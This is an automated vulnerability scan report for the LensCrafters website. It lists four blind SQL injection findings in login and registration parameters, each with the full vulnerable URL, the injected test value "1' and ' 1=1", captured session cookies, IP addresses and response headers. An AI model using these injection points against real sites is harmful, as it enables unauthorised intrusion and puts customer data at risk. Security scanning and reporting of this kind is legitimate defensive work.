Report for http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?storeId=10851&catalogId=11651&langId=-1&errorViewName=UserRegistrationAddAjaxView&URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId=11651%26myAcctMain=1%26langId=-1%26storeId=10851&challengeQuestion=-&challengeAnswer=-&logonId=1&logonIdVerify=1&logonPassword=skipfish&temp_logonPassword=skipfish&logonPasswordVerify=skipfish&temp_logonPasswordVerify=9%201%20-&optin_18yrs=on&receiveEmail=on (Generated on 2013-09-23 02:27:03 +1130)

Found a false positive? Report it here.

[1] Blind SQL Injection (differential analysis) (Trusted — Severity: High)

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

In link input logonIdVerify using GET at http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1'+and+'+1=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-.

[2] Blind SQL Injection (differential analysis) (Trusted — Severity: High)

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

In link input logonId using GET at http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1'+and+'+1=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-.

[3] Blind SQL Injection (differential analysis) (Trusted — Severity: High)

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

In link input optin_18yrs using GET at http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on'+and+'+1=1&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-.

[4] Blind SQL Injection (differential analysis) (Trusted — Severity: High)

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

In link input receiveEmail using GET at http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on'+and+'+1=1&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-.

Configuration

Settings

Version: 1.0dev
Revision: 0.2.8
Audit started on: Mon Sep 23 01:48:28 2013
Audit finished on: Mon Sep 23 02:26:00 2013
Runtime: 00:37:33

Runtime options

URL: http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?storeId=10851&catalogId=11651&langId=-1&errorViewName=UserRegistrationAddAjaxView&URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId=11651%26myAcctMain=1%26langId=-1%26storeId=10851&challengeQuestion=-&challengeAnswer=-&logonId=1&logonIdVerify=1&logonPassword=skipfish&temp_logonPassword=skipfish&logonPasswordVerify=skipfish&temp_logonPasswordVerify=9%201%20-&optin_18yrs=on&receiveEmail=on
User agent: Mozilla/5.0

Audited elements	Modules	Filters	Cookies
Links Forms Cookies Headers	sqli sqli_blind_rdiff sqli_blind_timing	Exclude: N/A Include: N/A Redundant: N/A	JSESSIONID = 0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu WC_PERSISTENT = ARJHSX25nJdo1YMOflsClomVzVs= ;2013-09-22 03:41:23.758_1379839283758-280914_0 metroCode = 0 lc_zipcode = lc_state = lc_city = lc_country = Germany lc_latitude = 51.0 lc_longitude = 9.0 ipaddress = 87.118.91.140, 23.65.181.156, 46.33.71.253

Issues

Trusted
Untrusted

Trusted issues

At the time these issues were logged there were no abnormal interferences or anomalous server behavior.
These issues are considered trusted and fairly accurate.

[1] Blind SQL Injection (differential analysis)

Module name: Blind SQL Injection (differential analysis)
(Internal module name: BlindrDiffSQLInjection)
Affected variable: logonIdVerify
Affected URL: http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1'+and+'+1=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-
HTML Element: link
Requires manual verification?: No

CWE: 89
(http://cwe.mitre.org/data/definitions/89.html)
Severity: High
CVSSV2: 9.0

References

OWASP - http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC - http://capec.mitre.org/data/definitions/7.html

Description

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

Remedial guidance

Suppression of error messages leads to security through obscurity which is not a good practise. The web application needs to enforce stronger validation on user inputs.

[+] Variation 1

Affected URL:

Injected value:

 "1' and ' 1=1"

Regular expression:

Headers

Request

Response

Accept	text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding	gzip, deflate
User-Agent	Mozilla/5.0
Cookie	JSESSIONID=0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu;WC_PERSISTENT=ARJHSX25nJdo1YMOflsClomVzVs%3D%0A%3B2013-09-22+03:41:23.758_1379839283758-280914_0;metroCode=0;lc_zipcode=;lc_state=;lc_city=;lc_country=Germany;lc_latitude=51.0;lc_longitude=9.0;ipaddress=87.118.91.140,+23.65.181.156,+46.33.71.253

Server	IBM_HTTP_Server
Vary	Accept-Encoding
Content-Encoding	gzip
X-Ua-Compatible	IE=edge
P3p	CP='We do not have a P3P Policy see http://www.lenscrafters.com/lc-us/privacy-policy'
Content-Length	20
Content-Type	text/plain
Content-Language	en-US
Expires	Sun, 22 Sep 2013 08:44:05 GMT
Cache-Control	max-age=0, no-cache, no-store
Pragma	no-cache
Date	Sun, 22 Sep 2013 08:44:05 GMT
Connection	keep-alive

[2] Blind SQL Injection (differential analysis)

Module name: Blind SQL Injection (differential analysis)
(Internal module name: BlindrDiffSQLInjection)
Affected variable: logonId
Affected URL: http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1'+and+'+1=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-
HTML Element: link
Requires manual verification?: No

CWE: 89
(http://cwe.mitre.org/data/definitions/89.html)
Severity: High
CVSSV2: 9.0

References

OWASP - http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC - http://capec.mitre.org/data/definitions/7.html

Description

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

Remedial guidance

Suppression of error messages leads to security through obscurity which is not a good practise. The web application needs to enforce stronger validation on user inputs.

[+] Variation 1

Affected URL:

Injected value:

 "1' and ' 1=1"

Regular expression:

Headers

Request

Response

Accept	text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding	gzip, deflate
User-Agent	Mozilla/5.0
Cookie	JSESSIONID=0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu;WC_PERSISTENT=ARJHSX25nJdo1YMOflsClomVzVs%3D%0A%3B2013-09-22+03:41:23.758_1379839283758-280914_0;metroCode=0;lc_zipcode=;lc_state=;lc_city=;lc_country=Germany;lc_latitude=51.0;lc_longitude=9.0;ipaddress=87.118.91.140,+23.65.181.156,+46.33.71.253

Server	IBM_HTTP_Server
Vary	Accept-Encoding
Content-Encoding	gzip
X-Ua-Compatible	IE=edge
P3p	CP='We do not have a P3P Policy see http://www.lenscrafters.com/lc-us/privacy-policy'
Content-Length	20
Content-Type	text/plain
Content-Language	en-US
Expires	Sun, 22 Sep 2013 08:44:05 GMT
Cache-Control	max-age=0, no-cache, no-store
Pragma	no-cache
Date	Sun, 22 Sep 2013 08:44:05 GMT
Connection	keep-alive

[3] Blind SQL Injection (differential analysis)

Module name: Blind SQL Injection (differential analysis)
(Internal module name: BlindrDiffSQLInjection)
Affected variable: optin_18yrs
Affected URL: http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on'+and+'+1=1&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-
HTML Element: link
Requires manual verification?: No

CWE: 89
(http://cwe.mitre.org/data/definitions/89.html)
Severity: High
CVSSV2: 9.0

References

OWASP - http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC - http://capec.mitre.org/data/definitions/7.html

Description

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

Remedial guidance

Suppression of error messages leads to security through obscurity which is not a good practise. The web application needs to enforce stronger validation on user inputs.

[+] Variation 1

Affected URL:

Injected value:

 "on' and ' 1=1"

Regular expression:

Headers

Request

Response

Accept	text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding	gzip, deflate
User-Agent	Mozilla/5.0
Cookie	JSESSIONID=0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu;WC_PERSISTENT=ARJHSX25nJdo1YMOflsClomVzVs%3D%0A%3B2013-09-22+03:41:23.758_1379839283758-280914_0;metroCode=0;lc_zipcode=;lc_state=;lc_city=;lc_country=Germany;lc_latitude=51.0;lc_longitude=9.0;ipaddress=87.118.91.140,+23.65.181.156,+46.33.71.253

Server	IBM_HTTP_Server
Cached-Response	true
Vary	Accept-Encoding
Content-Encoding	gzip
X-Ua-Compatible	IE=edge
P3p	CP='We do not have a P3P Policy see http://www.lenscrafters.com/lc-us/privacy-policy'
Content-Type	text/html;charset=UTF-8
Content-Language	en-US
Content-Length	1628
Expires	Sun, 22 Sep 2013 09:16:30 GMT
Cache-Control	max-age=0, no-cache, no-store
Pragma	no-cache
Date	Sun, 22 Sep 2013 09:16:30 GMT
Connection	keep-alive
Set-Cookie	metroCode=0; Path=/
Set-Cookie	lc_zipcode=""; Path=/
Set-Cookie	lc_state=02; Path=/
Set-Cookie	lc_city=N�rnberg; Path=/
Set-Cookie	lc_country=Germany; Path=/
Set-Cookie	lc_latitude=49.4478; Path=/
Set-Cookie	lc_longitude=11.068298; Path=/
Set-Cookie	ipaddress=85.10.211.53%2C+23.65.181.159; Path=/

[4] Blind SQL Injection (differential analysis)

Module name: Blind SQL Injection (differential analysis)
(Internal module name: BlindrDiffSQLInjection)
Affected variable: receiveEmail
Affected URL: http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on'+and+'+1=1&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-
HTML Element: link
Requires manual verification?: No

CWE: 89
(http://cwe.mitre.org/data/definitions/89.html)
Severity: High
CVSSV2: 9.0

References

OWASP - http://www.owasp.org/index.php/Blind_SQL_Injection
MITRE - CAPEC - http://capec.mitre.org/data/definitions/7.html

Description

SQL code can be injected into the web application even though it may not be obvious due to suppression of error messages.

Remedial guidance

Suppression of error messages leads to security through obscurity which is not a good practise. The web application needs to enforce stronger validation on user inputs.

[+] Variation 1

Affected URL:

Injected value:

 "on' and ' 1=1"

Regular expression:

Headers

Request

Response

Accept	text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Encoding	gzip, deflate
User-Agent	Mozilla/5.0
Cookie	JSESSIONID=0000zQzQiufuDg9NO0AO_A46UzN:17buvsftu;WC_PERSISTENT=ARJHSX25nJdo1YMOflsClomVzVs%3D%0A%3B2013-09-22+03:41:23.758_1379839283758-280914_0;metroCode=0;lc_zipcode=;lc_state=;lc_city=;lc_country=Germany;lc_latitude=51.0;lc_longitude=9.0;ipaddress=87.118.91.140,+23.65.181.156,+46.33.71.253

Server	IBM_HTTP_Server
Vary	Accept-Encoding
Content-Encoding	gzip
X-Ua-Compatible	IE=edge
P3p	CP='We do not have a P3P Policy see http://www.lenscrafters.com/lc-us/privacy-policy'
Content-Length	20
Content-Type	text/plain
Content-Language	en-US
Expires	Sun, 22 Sep 2013 08:44:05 GMT
Cache-Control	max-age=0, no-cache, no-store
Pragma	no-cache
Date	Sun, 22 Sep 2013 08:44:05 GMT
Connection	keep-alive

Untrusted

These issues are considered untrusted (and may in fact be false positives) because at the time they were identified the server was exhibiting some kind of anomalous behavior or there was third part interference (like network latency for example).
The listed issues need verification by a human.

No untrusted issues have been logged.

Plugin results

Resolver
Health map

Resolves vulnerable hostnames to IP addresses.

Results

Hostname	IP Address
www.lenscrafters.com	23.66.236.125

Generates a simple list of safe/unsafe URLs.

Stats

Total: 5
Safe: 1
Unsafe: 4
Issue percentage: 80%

Sitemap

URL List

2 pages

http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%201%20-
http://www.lenscrafters.com/webapp/wcs/stores/servlet/CachedSuggestionsView?URL=http://www.lenscrafters.com/webapp/wcs/stores/servlet/YourAccount?catalogId&catalogId=11651&challengeAnswer=-&challengeQuestion=-&errorViewName=UserRegistrationAddAjaxView&langId=-1&logonId=1&logonIdVerify=1&logonPassword=skipfish&logonPasswordVerify=skipfish&optin_18yrs=on&receiveEmail=on&storeId=10851&temp_logonPassword=skipfish&temp_logonPasswordVerify=9%25201%2520-